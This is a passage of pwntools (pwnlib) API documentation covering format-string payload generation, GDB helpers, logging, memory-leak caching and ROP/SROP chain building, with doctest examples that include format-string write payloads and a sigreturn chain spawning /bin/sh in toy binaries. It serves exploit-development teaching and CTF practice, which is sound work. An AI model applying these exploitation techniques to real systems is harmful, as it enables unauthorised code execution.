def send_payload(payload):
log.info("payload = %s" % repr(payload))
p.sendline(payload)
return p.recv()
# Create a FmtStr object and give to him the function
format_string = FmtStr(execute_fmt=send_payload)
format_string.write(0x0, 0x1337babe) # write 0x1337babe at 0x0
format_string.write(0x1337babe, 0x0) # write 0x0 at 0x1337babe
format_string.execute_writes()
-
class
pwnlib.fmtstr.
FmtStr
(execute_fmt, offset=None, padlen=0, numbwritten=0)[source]¶ Provides an automated format string exploitation.
It takes a function which is called every time the automated process want to communicate with the vulnerable process. this function takes a parameter with the payload that you have to send to the vulnerable process and must return the process returns.
If the offset parameter is not given, then try to find the right offset by leaking stack data.
Parameters: -
write
(addr, data) → None[source]¶ In order to tell : I want to write
data
ataddr
.Parameters: Returns: None
Examples
>>> def send_fmt_payload(payload): ... print repr(payload) ... >>> f = FmtStr(send_fmt_payload, offset=5) >>> f.write(0x08040506, 0x1337babe) >>> f.execute_writes() '\x06\x05\x04\x08\x07\x05\x04\x08\x08\x05\x04\x08\t\x05\x04\x08%174c%5$hhn%252c%6$hhn%125c%7$hhn%220c%8$hhn'
-
-
pwnlib.fmtstr.
fmtstr_payload
(offset, writes, numbwritten=0, write_size='byte') → str[source]¶ Makes payload with given parameter. It can generate payload for 32 or 64 bits architectures. The size of the addr is taken from
context.bits
Parameters: - offset (int) – the first formatter’s offset you control
- writes (dict) – dict with addr, value
{addr: value, addr2: value2}
- numbwritten (int) – number of byte already written by the printf function
- write_size (str) – must be
byte
,short
orint
. Tells if you want to write byte by byte, short by short or int by int (hhn, hn or n)
Returns: The payload in order to do needed writes
Examples
>>> context.clear(arch = 'amd64') >>> print repr(fmtstr_payload(1, {0x0: 0x1337babe}, write_size='int')) '\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00%322419374c%1$n%3972547906c%2$n' >>> print repr(fmtstr_payload(1, {0x0: 0x1337babe}, write_size='short')) '\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00%47774c%1$hn%22649c%2$hn%60617c%3$hn%4$hn' >>> print repr(fmtstr_payload(1, {0x0: 0x1337babe}, write_size='byte')) '\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x07\x00\x00\x00\x00\x00\x00\x00%126c%1$hhn%252c%2$hhn%125c%3$hhn%220c%4$hhn%237c%5$hhn%6$hhn%7$hhn%8$hhn' >>> context.clear(arch = 'i386') >>> print repr(fmtstr_payload(1, {0x0: 0x1337babe}, write_size='int')) '\x00\x00\x00\x00%322419386c%1$n' >>> print repr(fmtstr_payload(1, {0x0: 0x1337babe}, write_size='short')) '\x00\x00\x00\x00\x02\x00\x00\x00%47798c%1$hn%22649c%2$hn' >>> print repr(fmtstr_payload(1, {0x0: 0x1337babe}, write_size='byte')) '\x00\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00\x03\x00\x00\x00%174c%1$hhn%252c%2$hhn%125c%3$hhn%220c%4$hhn'
pwnlib.gdb
— Working with GDB¶
-
pwnlib.gdb.
attach
(target, execute = None, exe = None, arch = None) → None[source]¶ Start GDB in a new terminal and attach to target.
pwnlib.util.proc.pidof()
is used to find the PID of target except when target is a(host, port)
-pair. In that case target is assumed to be a GDB server.If it is running locally and exe is not given we will try to find the path of the target binary from parsing the command line of the program running the GDB server (e.g. qemu or gdbserver). Notice that if the PID is known (when target is not a GDB server) exe will be read from
/proc/<pid>/exe
.If gdb-multiarch is installed we use that or ‘gdb’ otherwise.
Parameters: Returns: None
-
pwnlib.gdb.
debug
(args) → tube[source]¶ Launch a GDB server with the specified command line, and launches GDB to attach to it.
Parameters: - args – Same args as passed to pwnlib.tubes.process
- ssh – Remote ssh session to use to launch the process. Automatically sets up port forwarding so that gdb runs locally.
Returns: A tube connected to the target process
-
pwnlib.gdb.
debug_assembly
(*a, **kw)[source]¶ Creates an ELF file, and launches it with GDB.
This is identical to debug_shellcode, except that any defined symbols are available in GDB, and it saves you the explicit call to asm().
-
pwnlib.gdb.
debug_shellcode
(*a, **kw)[source]¶ Creates an ELF file, and launches it with GDB.
Parameters: Returns: A
process
tube connected to the shellcode on stdin/stdout/stderr.
-
pwnlib.gdb.
find_module_addresses
(binary, ssh=None, ulimit=False)[source]¶ Cheat to find modules by using GDB.
We can’t use
/proc/$pid/map
since some servers forbid it. This breaksinfo proc
in GDB, butinfo sharedlibrary
still works. Additionally,info sharedlibrary
works on FreeBSD, which may not have procfs enabled or accessible.The output looks like this:
info proc mapping process 13961 warning: unable to open /proc file '/proc/13961/maps' info sharedlibrary From To Syms Read Shared Object Library 0xf7fdc820 0xf7ff505f Yes (*) /lib/ld-linux.so.2 0xf7fbb650 0xf7fc79f8 Yes /lib32/libpthread.so.0 0xf7e26f10 0xf7f5b51c Yes (*) /lib32/libc.so.6 (*): Shared library is missing debugging information.
Note that the raw addresses provided by
info sharedlibrary
are actually the address of the.text
segment, not the image base address.This routine automates the entire process of:
- Downloading the binaries from the remote server
- Scraping GDB for the information
- Loading each library into an ELF
- Fixing up the base address vs. the
.text
segment address
Parameters: - binary (str) – Path to the binary on the remote server
- ssh (pwnlib.tubes.tube) – SSH connection through which to load the libraries.
If left as
None
, will use apwnlib.tubes.process.process
. - ulimit (bool) – Set to
True
to run “ulimit -s unlimited” before GDB.
Returns: A list of pwnlib.elf.ELF objects, with correct base addresses.
Example:
>>> with context.local(log_level=9999): ... shell = ssh(host='bandit.labs.overthewire.org',user='bandit0',password='bandit0') ... bash_libs = gdb.find_module_addresses('/bin/bash', shell) >>> os.path.basename(bash_libs[0].path) 'libc.so.6' >>> hex(bash_libs[0].symbols['system']) '0x7ffff7634660'
pwnlib.log
— Logging stuff¶
Logging module for printing status during an exploit, and internally
within binjitsu
.
Exploit Developers¶
By using the standard from pwn import *
, an object named log
will
be inserted into the global namespace. You can use this to print out
status messages during exploitation.
For example,:
log.info('Hello, world!')
prints:
[*] Hello, world!
Additionally, there are some nifty mechanisms for performing status updates on a running job (e.g. when brute-forcing).:
p = log.progress('Working')
p.status('Reticulating splines')
time.sleep(1)
p.success('Got a shell!')
The verbosity of logging can be most easily controlled by setting
log_level
on the global context
object.:
log.info("No you see me")
context.log_level = 'error'
log.info("Now you don't")
The purpose of this attribute is to control what gets printed to the screen, not what gets emitted. This means that you can put all logging events into a log file, while only wanting to see a small subset of them on your screen.
Pwnlib Developers¶
A module-specific logger can be imported into the module via:
from .log import getLogger
log = getLogger(__name__)
This provides an easy way to filter logging programmatically or via a configuration file for debugging.
When using progress
, you should use the with
keyword to manage scoping, to ensure the spinner stops if an
exception is thrown.
Technical details¶
Familiarity with the logging
module is assumed.
A pwnlib root logger named ‘pwnlib’ is created and a custom handler and
formatter is installed for it. The handler determines its logging level from
context.log_level
.
Ideally context.log_level
should only affect which records will be
emitted by the handler such that e.g. logging to a file will not be changed by
it. But for performance reasons it is not feasible log everything in the normal
case. In particular there are tight loops inside pwnlib.tubes.tube
, which
we would like to be able to debug, but if we are not debugging them, they should
not spit out messages (even to a log file). For this reason there are a few places
inside pwnlib, that will not even emit a record without context.log_level
being set to logging.DEBUG or below.
Log records created by Progress
and Logger
objects will set
'pwnlib_msgtype'
on the extra
field to signal which kind of message was
generated. This information is used by the formatter to prepend a symbol to the
message, e.g. '[+] '
in '[+] got a shell!'
This field is ignored when using the logging
module’s standard formatters.
All status updates (which are not dropped due to throttling) on progress loggers
result in a log record being created. The extra
field then carries a
reference to the Progress
logger as 'pwnlib_progress'
.
If the custom handler determines that term.term_mode
is enabled, log
records that have a 'pwnlib_progess'
in their extra
field will not
result in a message being emitted but rather an animated progress line (with a
spinner!) being created. Note that other handlers will still see a meaningful
log record.
The custom handler will only handle log records whith a level of at least
context.log_level
. Thus if e.g. the level for the
'pwnlib.tubes.ssh'
is set to 'DEBUG'
no additional output will show up
unless context.log_level
is also set to 'DEBUG'
. Other handlers
will however see the extra log records generated by the 'pwnlib.tubes.ssh'
logger.
-
class
pwnlib.log.
Progress
(logger, msg, status, level, args, kwargs)[source]¶ Progress logger used to generate log records associated with some running job. Instances can be used as context managers which will automatically declare the running job a success upon exit or a failure upon a thrown exception. After
success()
orfailure()
is called the status can no longer be updated.This class is intended for internal use. Progress loggers should be created using
Logger.progress()
.-
status
(status, *args, **kwargs)[source]¶ Logs a status update for the running job.
If the progress logger is animated the status line will be updated in place.
Status updates are throttled at one update per 100ms.
-
-
class
pwnlib.log.
Logger
(logger=None)[source]¶ A class akin to the
logging.LoggerAdapter
class. All public methods defined onlogging.Logger
instances are defined on this class.Also adds some
pwnlib
flavor:progress()
(aliaswaitfor()
)success()
failure()
indented()
info_once()
warning_once()
(aliaswarn_once()
)
Adds
pwnlib
-specific information for coloring, indentation and progress logging via log recordsextra
field.Loggers instantiated with
getLogger()
will be of this class.-
progress
(message, status = '', *args, level = logging.INFO, **kwargs) → Progress[source]¶ Creates a new progress logger which creates log records with log level level.
Progress status can be updated using
Progress.status()
and stopped usingProgress.success()
orProgress.failure()
.If term.term_mode is enabled the progress logger will be animated.
The progress manager also functions as a context manager. Using context managers ensures that animations stop even if an exception is raised.
with log.progress('Trying something...') as p: for i in range(10): p.status("At %i" % i) time.sleep(0.5) x = 1/0
-
waitfor
(*args, **kwargs)[source]¶ Alias for
progress()
.
-
indented
(message, *args, level = logging.INFO, **kwargs)[source]¶ Log a message but don’t put a line prefix on it.
Parameters: level (int) – Alternate log level at which to set the indented message. Defaults to logging.INFO
.
-
info_once
(message, *args, **kwargs)[source]¶ Logs an info message. The same message is never printed again.
-
warning_once
(message, *args, **kwargs)[source]¶ Logs a warning message. The same message is never printed again.
-
warn_once
(*args, **kwargs)[source]¶ Alias for
warning_once()
.
-
error
(message, *args, **kwargs)[source]¶ To be called outside an exception handler.
Logs an error message, then raises a
PwnlibException
.
-
exception
(message, *args, **kwargs)[source]¶ To be called from an exception handler.
Logs a error message, then re-raises the current exception.
-
log
(level, message, *args, **kwargs)[source]¶ Logs a message with log level level. The
pwnlib
formatter will use the defaultlogging
formater to format this message.
-
class
pwnlib.log.
Handler
(stream=None)[source]¶ A custom handler class. This class will report whatever
context.log_level
is currently set to as its log level.If
term.term_mode
is enabled log records originating from a progress logger will not be emitted but rather an animated progress line will be created.This handler outputs to
sys.stderr
.An instance of this handler is added to the
'pwnlib'
logger.
-
class
pwnlib.log.
Formatter
(fmt=None, datefmt=None)[source]¶ Logging formatter which performs custom formatting for log records containing the
'pwnlib_msgtype'
attribute. Other records are formatted using the logging modules default formatter.If
'pwnlib_msgtype'
is set, it performs the following actions:- A prefix looked up in _msgtype_prefixes is prepended to the message.
- The message is prefixed such that it starts on column four.
- If the message spans multiple lines they are split, and all subsequent lines are indented.
This formatter is used by the handler installed on the
'pwnlib'
logger.
pwnlib.memleak
— Helper class for leaking memory¶
-
class
pwnlib.memleak.
MemLeak
(f, search_range=20, reraise=True)[source]¶ MemLeak is a caching and heuristic tool for exploiting memory leaks.
It can be used as a decorator, around functions of the form:
- def some_leaker(addr):
- ... return data_as_string_or_None
It will cache leaked memory (which requires either non-randomized static data or a continouous session). If required, dynamic or known data can be set with the set-functions, but this is usually not required. If a byte cannot be recovered, it will try to leak nearby bytes in the hope that the byte is recovered as a side-effect.
Parameters: Example
>>> import pwnlib >>> binsh = pwnlib.util.misc.read('/bin/sh') >>> @pwnlib.memleak.MemLeak ... def leaker(addr): ... print "leaking 0x%x" % addr ... return binsh[addr:addr+4] >>> leaker.s(0)[:4] leaking 0x0 leaking 0x4 '\x7fELF' >>> leaker[:4] '\x7fELF' >>> hex(leaker.d(0)) '0x464c457f' >>> hex(leaker.clearb(1)) '0x45' >>> hex(leaker.d(0)) leaking 0x1 '0x464c457f' >>> @pwnlib.memleak.MemLeak ... def leaker_nonulls(addr): ... print "leaking 0x%x" % addr ... if addr & 0xff == 0: ... return None ... return binsh[addr:addr+4] >>> leaker_nonulls.d(0) == None leaking 0x0 True >>> leaker_nonulls[0x100:0x104] == binsh[0x100:0x104] leaking 0x100 leaking 0xff leaking 0x103 True
-
static
NoNewlines
(function)[source]¶ Wrapper for leak functions such that addresses which contain newline bytes are not leaked.
This is useful if the address which is used for the leak is provided by e.g.
fgets()
.
-
static
NoNulls
(function)[source]¶ Wrapper for leak functions such that addresses which contain NULL bytes are not leaked.
This is useful if the address which is used for the leak is read in via a string-reading function like
scanf("%s")
or smilar.
-
static
NoWhitespace
(function)[source]¶ Wrapper for leak functions such that addresses which contain whitespace bytes are not leaked.
This is useful if the address which is used for the leak is read in via e.g.
scanf()
.
-
static
String
(function)[source]¶ Wrapper for leak functions which leak strings, such that a NULL terminator is automaticall added.
This is useful if the data leaked is printed out as a NULL-terminated string, via e.g.
printf()
.
-
b
(addr, ndx = 0) → int[source]¶ Leak byte at
((uint8_t*) addr)[ndx]
Examples
>>> import string >>> data = string.ascii_lowercase >>> l = MemLeak(lambda a: data[a:a+2], reraise=False) >>> l.b(0) == ord('a') True >>> l.b(25) == ord('z') True >>> l.b(26) is None True
-
clearb
(addr, ndx = 0) → int[source]¶ Clears byte at
((uint8_t*)addr)[ndx]
from the cache and returns the removed value or None if the address was not completely set.Examples
>>> l = MemLeak(lambda a: None) >>> l.cache = {0:'a'} >>> l.n(0,1) == 'a' True >>> l.clearb(0) == unpack('a', 8) True >>> l.cache {} >>> l.clearb(0) is None True
-
cleard
(addr, ndx = 0) → int[source]¶ Clears dword at
((uint32_t*)addr)[ndx]
from the cache and returns the removed value or None if the address was not completely set.Examples
>>> l = MemLeak(lambda a: None) >>> l.cache = {0:'a', 1: 'b', 2: 'c', 3: 'd'} >>> l.n(0, 4) == 'abcd' True >>> l.cleard(0) == unpack('abcd', 32) True >>> l.cache {}
-
clearq
(addr, ndx = 0) → int[source]¶ Clears qword at
((uint64_t*)addr)[ndx]
from the cache and returns the removed value or None if the address was not completely set.Examples
>>> c = MemLeak(lambda addr: '') >>> c.cache = {x:'x' for x in range(0x100, 0x108)} >>> c.clearq(0x100) == unpack('xxxxxxxx', 64) True >>> c.cache == {} True
-
clearw
(addr, ndx = 0) → int[source]¶ Clears word at
((uint16_t*)addr)[ndx]
from the cache and returns the removed value or None if the address was not completely set.Examples
>>> l = MemLeak(lambda a: None) >>> l.cache = {0:'a', 1: 'b'} >>> l.n(0, 2) == 'ab' True >>> l.clearw(0) == unpack('ab', 16) True >>> l.cache {}
-
d
(addr, ndx = 0) → int[source]¶ Leak dword at
((uint32_t*) addr)[ndx]
Examples
>>> import string >>> data = string.ascii_lowercase >>> l = MemLeak(lambda a: data[a:a+8], reraise=False) >>> l.d(0) == unpack('abcd', 32) True >>> l.d(22) == unpack('wxyz', 32) True >>> l.d(23) is None True
-
field
(address, obj)[source]¶ field(address, field) => a structure field.
Leak a field from a structure.
Parameters: - address (int) – Base address to calculate offsets from
- field (obj) – Instance of a ctypes field
- Return Value:
- The type of the return value will be dictated by
the type of
field
.
-
field_compare
(address, obj, expected)[source]¶ field_compare(address, field, expected) ==> bool
Leak a field from a structure, with an expected value. As soon as any mismatch is found, stop leaking the structure.
Parameters: - address (int) – Base address to calculate offsets from
- field (obj) – Instance of a ctypes field
- expected (int,str) – Expected value
- Return Value:
- The type of the return value will be dictated by
the type of
field
.
-
n
(addr, ndx = 0) → str[source]¶ Leak numb bytes at addr.
Returns: A string with the leaked bytes, will return None if any are missing Examples
>>> import string >>> data = string.ascii_lowercase >>> l = MemLeak(lambda a: data[a:a+4], reraise=False) >>> l.n(0,1) == 'a' True >>> l.n(0,26) == data True >>> len(l.n(0,26)) == 26 True >>> l.n(0,27) is None True
-
q
(addr, ndx = 0) → int[source]¶ Leak qword at
((uint64_t*) addr)[ndx]
Examples
>>> import string >>> data = string.ascii_lowercase >>> l = MemLeak(lambda a: data[a:a+16], reraise=False) >>> l.q(0) == unpack('abcdefgh', 64) True >>> l.q(18) == unpack('stuvwxyz', 64) True >>> l.q(19) is None True
-
s
(addr) → str[source]¶ Leak bytes at addr until failure or a nullbyte is found
Returns: A string, without a NULL terminator. The returned string will be empty if the first byte is a NULL terminator, or if the first byte could not be retrieved. Examples
>>> data = "Hello\x00World" >>> l = MemLeak(lambda a: data[a:a+4], reraise=False) >>> l.s(0) == "Hello" True >>> l.s(5) == "" True >>> l.s(6) == "World" True >>> l.s(999) == "" True
-
setb
(addr, val, ndx=0)[source]¶ Sets byte at
((uint8_t*)addr)[ndx]
to val in the cache.Examples
>>> l = MemLeak(lambda x: '') >>> l.cache == {} True >>> l.setb(33, 0x41) >>> l.cache == {33: 'A'} True
-
setd
(addr, val, ndx=0)[source]¶ Sets dword at
((uint32_t*)addr)[ndx]
to val in the cache.Examples
See
setw()
.
-
setq
(addr, val, ndx=0)[source]¶ Sets qword at
((uint64_t*)addr)[ndx]
to val in the cache.Examples
See
setw()
.
-
sets
(addr, val, null_terminate=True)[source]¶ Set known string at addr, which will be optionally be null-terminated
Note that this method is a bit dumb about how it handles the data. It will null-terminate the data, but it will not stop at the first null.
Examples
>>> l = MemLeak(lambda x: '') >>> l.cache == {} True >>> l.sets(0, 'H\x00ello') >>> l.cache == {0: 'H', 1: '\x00', 2: 'e', 3: 'l', 4: 'l', 5: 'o', 6: '\x00'} True
-
setw
(addr, val, ndx=0)[source]¶ Sets word at
((uint16_t*)addr)[ndx]
to val in the cache.Examples
>>> l = MemLeak(lambda x: '') >>> l.cache == {} True >>> l.setw(33, 0x41) >>> l.cache == {33: 'A', 34: '\x00'} True
-
struct
(address, struct)[source]¶ struct(address, struct) => structure object Leak an entire structure. :param address: Addess of structure in memory :type address: int :param struct: A ctypes structure to be instantiated with leaked data :type struct: class
- Return Value:
- An instance of the provided struct class, with the leaked data decoded
pwnlib.replacements
— Replacements for various functions¶
Improved replacements for standard functions
-
pwnlib.replacements.
sleep
(n)[source]¶ Replacement for
time.sleep()
, which does not return if a signal is received.Parameters: n (int) – Number of seconds to sleep.
pwnlib.rop
— Return Oriented Programming¶
Submodules¶
pwnlib.rop.rop
— Return Oriented Programming¶
Return Oriented Programming
Manual ROP¶
The ROP tool can be used to build stacks pretty trivially. Let’s create a fake binary which has some symbols which might have been useful.
>>> context.clear(arch='i386')
>>> binary = ELF.from_assembly('add esp, 0x10; ret')
>>> binary.symbols = {'read': 0xdeadbeef, 'write': 0xdecafbad, 'exit': 0xfeedface}
Creating a ROP object which looks up symbols in the binary is pretty straightforward.
>>> rop = ROP(binary)
With the ROP object, you can manually add stack frames.
>>> rop.raw(0)
>>> rop.raw(unpack('abcd'))
>>> rop.raw(2)
Inspecting the ROP stack is easy, and laid out in an easy-to-read manner.
>>> print rop.dump()
0x0000: 0x0
0x0004: 0x64636261
0x0008: 0x2
The ROP module is also aware of how to make function calls with standard Linux ABIs.
>>> rop.call('read', [4,5,6])
>>> print rop.dump()
0x0000: 0x0
0x0004: 0x64636261
0x0008: 0x2
0x000c: 0xdeadbeef read(4, 5, 6)
0x0010: 'eaaa' <pad>
0x0014: 0x4 arg0
0x0018: 0x5 arg1
0x001c: 0x6 arg2
You can also use a shorthand to invoke calls. The stack is automatically adjusted for the next frame
>>> rop.write(7,8,9)
>>> rop.exit()
>>> print rop.dump()
0x0000: 0x0
0x0004: 0x64636261
0x0008: 0x2
0x000c: 0xdeadbeef read(4, 5, 6)
0x0010: 0x10000000 <adjust: add esp, 0x10; ret>
0x0014: 0x4 arg0
0x0018: 0x5 arg1
0x001c: 0x6 arg2
0x0020: 'iaaa' <pad>
0x0024: 0xdecafbad write(7, 8, 9)
0x0028: 0x10000000 <adjust: add esp, 0x10; ret>
0x002c: 0x7 arg0
0x0030: 0x8 arg1
0x0034: 0x9 arg2
0x0038: 'oaaa' <pad>
0x003c: 0xfeedface exit()
0x0040: 'qaaa' <pad>
ROP Example¶
Let’s assume we have a trivial binary that just reads some data onto the stack, and returns.
>>> context.clear(arch='i386')
>>> c = constants
>>> assembly = 'read:' + shellcraft.read(c.STDIN_FILENO, 'esp', 1024)
>>> assembly += 'ret\n'
Let’s provide some simple gadgets:
>>> assembly += 'add_esp: add esp, 0x10; ret\n'
And perhaps a nice “write” function.
>>> assembly += 'write: enter 0,0\n'
>>> assembly += ' mov ebx, [ebp+4+4]\n'
>>> assembly += ' mov ecx, [ebp+4+8]\n'
>>> assembly += ' mov edx, [ebp+4+12]\n'
>>> assembly += shellcraft.write('ebx', 'ecx', 'edx')
>>> assembly += ' leave\n'
>>> assembly += ' ret\n'
>>> assembly += 'flag: .asciz "The flag"\n'
And a way to exit cleanly.
>>> assembly += 'exit: ' + shellcraft.exit(0)
>>> binary = ELF.from_assembly(assembly)
Finally, let’s build our ROP stack
>>> rop = ROP(binary)
>>> rop.write(c.STDOUT_FILENO, binary.symbols['flag'], 8)
>>> rop.exit()
>>> print rop.dump()
0x0000: 0x10000012 write(STDOUT_FILENO, 268435494, 8)
0x0004: 0x1000000e <adjust: add esp, 0x10; ret>
0x0008: 0x1 arg0
0x000c: 0x10000026 flag
0x0010: 0x8 arg2
0x0014: 'faaa' <pad>
0x0018: 0x1000002f exit()
0x001c: 'haaa' <pad>
The raw data from the ROP stack is available via str.
>>> raw_rop = str(rop)
>>> print enhex(raw_rop)
120000100e000010010000002600001008000000666161612f00001068616161
Let’s try it out!
>>> p = process(binary.path)
>>> p.send(raw_rop)
>>> print p.recvall(timeout=5)
The flag
ROP + Sigreturn¶
In some cases, control of the desired register is not available. However, if you have control of the stack, EAX, and can find a int 0x80 gadget, you can use sigreturn.
Even better, this happens automagically.
Our example binary will read some data onto the stack, and not do anything else interesting.
>>> context.clear(arch='i386')
>>> c = constants
>>> assembly = 'read:' + shellcraft.read(c.STDIN_FILENO, 'esp', 1024)
>>> assembly += 'ret\n'
>>> assembly += 'pop eax; ret\n'
>>> assembly += 'int 0x80\n'
>>> assembly += 'binsh: .asciz "/bin/sh"'
>>> binary = ELF.from_assembly(assembly)
Let’s create a ROP object and invoke the call.
>>> context.kernel = 'amd64'
>>> rop = ROP(binary)
>>> binsh = binary.symbols['binsh']
>>> rop.execve(binsh, 0, 0)
That’s all there is to it.
>>> print rop.dump()
0x0000: 0x1000000e pop eax; ret
0x0004: 0x77
0x0008: 0x1000000b int 0x80
0x000c: 0x0 gs
0x0010: 0x0 fs
0x0014: 0x0 es
0x0018: 0x0 ds
0x001c: 0x0 edi
0x0020: 0x0 esi
0x0024: 0x0 ebp
0x0028: 0x0 esp
0x002c: 0x10000012 ebx = binsh
0x0030: 0x0 edx
0x0034: 0x0 ecx
0x0038: 0xb eax
0x003c: 0x0 trapno
0x0040: 0x0 err
0x0044: 0x1000000b int 0x80
0x0048: 0x23 cs
0x004c: 0x0 eflags
0x0050: 0x0 esp_at_signal
0x0054: 0x2b ss
0x0058: 0x0 fpstate
Let’s try it out!
>>> p = process(binary.path)
>>> p.send(str(rop))
>>> time.sleep(1)
>>> p.sendline('echo hello; exit')
>>> p.recvline()
'hello\n'
-
class
pwnlib.rop.rop.
ROP
(elfs, base=None, **kwargs)[source]¶ Class which simplifies the generation of ROP-chains.
Example:
elf = ELF('ropasaurusrex') rop = ROP(elf) rop.read(0, elf.bss(0x80)) rop.dump() # ['0x0000: 0x80482fc (read)', # '0x0004: 0xdeadbeef', # '0x0008: 0x0', # '0x000c: 0x80496a8'] str(rop) # '\xfc\x82\x04\x08\xef\xbe\xad\xde\x00\x00\x00\x00\xa8\x96\x04\x08'
>>> context.clear(arch = "i386", kernel = 'amd64') >>> assembly = 'int 0x80; ret; add esp, 0x10; ret; pop eax; ret' >>> e = ELF.from_assembly(assembly) >>> e.symbols['funcname'] = e.address + 0x1234 >>> r = ROP(e) >>> r.funcname(1, 2) >>> r.funcname(3) >>> r.execve(4, 5, 6) >>> print r.dump() 0x0000: 0x10001234 funcname(1, 2) 0x0004: 0x10000003 <adjust: add esp, 0x10; ret> 0x0008: 0x1 arg0 0x000c: 0x2 arg1 0x0010: 'eaaa' <pad> 0x0014: 'faaa' <pad> 0x0018: 0x10001234 funcname(3) 0x001c: 0x10000007 <adjust: pop eax; ret> 0x0020: 0x3 arg0 0x0024: 0x10000007 pop eax; ret 0x0028: 0x77 0x002c: 0x10000000 int 0x80 0x0030: 0x0 gs 0x0034: 0x0 fs 0x0038: 0x0 es 0x003c: 0x0 ds 0x0040: 0x0 edi 0x0044: 0x0 esi 0x0048: 0x0 ebp 0x004c: 0x0 esp 0x0050: 0x4 ebx 0x0054: 0x6 edx 0x0058: 0x5 ecx 0x005c: 0xb eax 0x0060: 0x0 trapno 0x0064: 0x0 err 0x0068: 0x10000000 int 0x80 0x006c: 0x23 cs 0x0070: 0x0 eflags 0x0074: 0x0 esp_at_signal 0x0078: 0x2b ss 0x007c: 0x0 fpstate
>>> r = ROP(e, 0x8048000) >>> r.funcname(1, 2) >>> r.funcname(3) >>> r.execve(4, 5, 6) >>> print r.dump() 0x8048000: 0x10001234 funcname(1, 2) 0x8048004: 0x10000003 <adjust: add esp, 0x10; ret> 0x8048008: 0x1 arg0 0x804800c: 0x2 arg1 0x8048010: 'eaaa' <pad> 0x8048014: 'faaa' <pad> 0x8048018: 0x10001234 funcname(3) 0x804801c: 0x10000007 <adjust: pop eax; ret> 0x8048020: 0x3 arg0 0x8048024: 0x10000007 pop eax; ret 0x8048028: 0x77 0x804802c: 0x10000000 int 0x80 0x8048030: 0x0 gs 0x8048034: 0x0 fs 0x8048038: 0x0 es 0x804803c: 0x0 ds 0x8048040: 0x0 edi 0x8048044: 0x0 esi 0x8048048: 0x0 ebp 0x804804c: 0x8048080 esp 0x8048050: 0x4 ebx 0x8048054: 0x6 edx 0x8048058: 0x5 ecx 0x804805c: 0xb eax 0x8048060: 0x0 trapno 0x8048064: 0x0 err 0x8048068: 0x10000000 int 0x80 0x804806c: 0x23 cs 0x8048070: 0x0 eflags 0x8048074: 0x0 esp_at_signal 0x8048078: 0x2b ss 0x804807c: 0x0 fpstate
-
build
(base=None, description=None)[source]¶ Construct the ROP chain into a list of elements which can be passed to
pwnlib.util.packing.flat
.Parameters:
-
call
(resolvable, arguments=(), abi=None, **kwargs)[source]¶ Add a call to the ROP chain
Parameters: - resolvable (str,int) – Value which can be looked up via ‘resolve’, or is already an integer.
- arguments (list) – List of arguments which can be passed to pack(). Alternately, if a base address is set, arbitrarily nested structures of strings or integers can be provided.
-
find_gadget
(instructions)[source]¶ Returns a gadget with the exact sequence of instructions specified in the
instructions
argument.
-
migrated
= False[source]¶ Whether or not the ROP chain directly sets the stack pointer to a value which is not contiguous
-
raw
(value)[source]¶ Adds a raw integer or string to the ROP chain.
If your architecture requires aligned values, then make sure that any given string is aligned!
Parameters: data (int/str) – The raw value to put onto the rop chain.
-
resolve
(resolvable)[source]¶ Resolves a symbol to an address
Parameters: resolvable (str,int) – Thing to convert into an address Returns: int containing address of ‘resolvable’, or None
-
search
(move=0, regs=None, order='size')[source]¶ Search for a gadget which matches the specified criteria.
Parameters: The search will try to minimize the number of bytes popped more than requested, the number of registers touched besides the requested and the address.
If
order == 'size'
, then gadgets are compared lexicographically by(total_moves, total_regs, addr)
, otherwise by(total_regs, total_moves, addr)
.Returns: A pwnlib.rop.gadgets.Gadget
object
-
search_iter
(move=None, regs=None)[source]¶ Iterate through all gadgets which move the stack pointer by at least
move
bytes, and which allow you to set all registers inregs
.
-
setRegisters
(registers)[source]¶ Returns an OrderedDict of addresses/values which will set the specified register context.
Parameters: registers (dict) – Dictionary of {register name: value}
Returns: An OrderedDict of {register: sequence of gadgets, values, etc.}
.
-
unresolve
(value)[source]¶ Inverts ‘resolve’. Given an address, it attempts to find a symbol for it in the loaded ELF files. If none is found, it searches all known gadgets, and returns the disassembly
Parameters: value (int) – Address to look up Returns: String containing the symbol name for the address, disassembly for a gadget (if there’s one at that address), or an empty string.
-
pwnlib.rop.srop
— Sigreturn Oriented Programming¶
Sigreturn ROP (SROP)
Sigreturn is a syscall used to restore the entire register context from memory pointed at by ESP.
We can leverage this during ROP to gain control of registers for which there are not convenient gadgets. The main caveat is that all registers are set, including ESP and EIP (or their equivalents). This means that in order to continue after using a sigreturn frame, the stack pointer must be set accordingly.
i386 Example:
Let’s just print a message out using SROP.
>>> message = "Hello, World"First, we’ll create our example binary. It just reads some data onto the stack, and invokes the
sigreturn
syscall. We also make anint 0x80
gadget available, followed immediately byexit(0)
.>>> context.clear(arch='i386') >>> assembly = 'read:' + shellcraft.read(constants.STDIN_FILENO, 'esp', 1024) >>> assembly += 'sigreturn:' + shellcraft.sigreturn() >>> assembly += 'int3:' + shellcraft.trap() >>> assembly += 'syscall: ' + shellcraft.syscall() >>> assembly += 'exit: ' + 'xor ebx, ebx; mov eax, 1; int 0x80;' >>> assembly += 'message: ' + ('.asciz "%s"' % message) >>> binary = ELF.from_assembly(assembly)Let’s construct our frame to have it invoke a
write
syscall, and dump the message to stdout.>>> frame = SigreturnFrame(kernel='amd64') >>> frame.eax = constants.SYS_write >>> frame.ebx = constants.STDOUT_FILENO >>> frame.ecx = binary.symbols['message'] >>> frame.edx = len(message) >>> frame.esp = 0xdeadbeef >>> frame.eip = binary.symbols['syscall']Let’s start the process, send the data, and check the message.
>>> p = process(binary.path) >>> p.send(str(frame)) >>> p.recvn(len(message)) == message True >>> p.wait_for_close() >>> p.poll() == 0 True
amd64 Example:
>>> context.clear()
>>> context.arch = "amd64"
>>> assembly = 'read:' + shellcraft.read(constants.STDIN_FILENO, 'rsp', 1024)
>>> assembly += 'sigreturn:' + shellcraft.sigreturn()
